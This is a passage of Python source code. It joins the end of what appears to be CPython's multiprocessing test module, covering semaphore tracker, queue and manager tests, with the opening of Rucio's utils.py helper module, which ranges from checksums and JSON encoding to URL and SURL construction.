if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
#
# Check that killing process does not leak named semaphores
#
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, r'semaphore_tracker: %r: \[Errno' % name1)
def check_semaphore_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.semaphore_tracker import _semaphore_tracker
_semaphore_tracker.ensure_running()
pid = _semaphore_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with contextlib.ExitStack() as stack:
if should_die:
stack.enter_context(self.assertWarnsRegex(
UserWarning,
"semaphore_tracker: process died"))
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
def test_semaphore_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_semaphore_tracker_death(signal.SIGINT, False)
def test_semaphore_tracker_sigkill(self):
# Uncatchable signal.
self.check_semaphore_tracker_death(signal.SIGKILL, True)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
print("Warning -- multiprocessing.Manager still has %s active "
"children after %s seconds"
% (multiprocessing.active_children(), dt),
file=sys.stderr)
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
print('Warning -- Shared objects which still exist at manager '
'shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling processes: %s' % processes,
file=sys.stderr)
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
print('Warning -- Dangling threads: %s' % threads,
file=sys.stderr)
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.process._cleanup()
test.support.gc_collect()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
utils.py | # -*- coding: utf-8 -*-
# Copyright 2012-2020 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2018
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2020
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2020
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2020
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Tomas Javurek <tomas.javurek@cern.ch>, 2019-2020
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - James Perry <j.perry@epcc.ed.ac.uk>, 2019
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019-2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
from __future__ import print_function
import base64
import copy
import datetime
import errno
import getpass
import hashlib
import imp
import json
import os
import os.path
import re
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from logging import getLogger, Formatter
from logging.handlers import RotatingFileHandler
from uuid import uuid4 as uuid
from xml.etree import ElementTree
import requests
from six import string_types, text_type, PY3
from rucio.common.config import config_get
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException
from rucio.common.types import InternalAccount, InternalScope
try:
# Python 2
from itertools import izip_longest
except ImportError:
# Python 3
from itertools import zip_longest as izip_longest
try:
# Python 2
from urllib import urlencode, quote
except ImportError:
# Python 3
from urllib.parse import urlencode, quote
try:
# Python 2
from StringIO import StringIO
except ImportError:
# Python 3
from io import StringIO
try:
# Python 2
import urlparse
except ImportError:
# Python 3
import urllib.parse as urlparse
# Extra modules: Only imported if available
EXTRA_MODULES = {'paramiko': False}
try:
from rucio.db.sqla.enum import EnumSymbol
EXTRA_MODULES['rucio.db.sqla.enum'] = True
except ImportError:
EXTRA_MODULES['rucio.db.sqla.enum'] = False
for extra_module in EXTRA_MODULES:
try:
imp.find_module(extra_module)
EXTRA_MODULES[extra_module] = True
except ImportError:
EXTRA_MODULES[extra_module] = False
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def build_url(url, path=None, params=None, doseq=False):
"""
utitily function to build an url for requests to the rucio system.
If the optional parameter doseq is evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
def oidc_identity_string(sub, iss):
"""
Transform IdP sub claim and issuers url into users identity string.
:param sub: users SUB claim from the Identity Provider
:param iss: issuer (IdP) https url
:returns: OIDC identity string "SUB=<usersid>, ISS=https://iam-test.ch/"
"""
return 'SUB=' + str(sub) + ', ISS=' + str(iss)
def sqlalchemy_obj_to_dict(sqlalchemyresult):
"""
Makes dictionary from SQLAlchemy query result object
:param sqlalchemyresult:
:returns: dictionary
"""
res_dict = copy.deepcopy(dict(sqlalchemyresult.__dict__))
del res_dict['_sa_instance_state']
return res_dict
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope string
- all items in required_audience are present in audience
returns false otherwise. audience and scope must be both strings
or both lists. Similarly for required_* variables.
If this condition is satisfied, False is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and # NOQA: W504
isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and # NOQA: W504
isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) and # NOQA: W504
isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and # NOQA: W504
isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'rb') as openFile:
for line in openFile:
adler = zlib.adler32(line, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
# backflip on 32bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
with open(file, "rb") as f:
bytes = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to to convert into string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return text_type(" ".join(vallist))
else:
return text_type(vallist)
except:
return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only supported date-like format
# supported at dmain schema level is 'datetime' .
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, EnumSymbol):
return obj.description
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(l):
""" JSON render function for list
"""
return json.dumps(l, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
ret_obj = None
try:
ret_obj = data.decode('utf-8')
except AttributeError:
ret_obj = data
return json.loads(ret_obj, object_hook=datetime_parser)
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = ''
err = ''
exitcode = 0
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out, err
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(l, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(l), n):
yield l[i:i + n]
def my_key_generator(namespace, fn, **kw):
"""
Customyzed key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def get_logger(name):
logger = getLogger(name)
hdlr = RotatingFileHandler('%s/%s.log' % (config_get('common', 'logdir'), name), maxBytes=1000000000, backupCount=10)
formatter = Formatter('%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(config_get('common', 'loglevel').upper())
return logger
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def construct_surl(dsn, filename, naming_convention=None):
# ensure that policy package is loaded in case it registers its own algorithms
import rucio.common.schema # noqa: F401
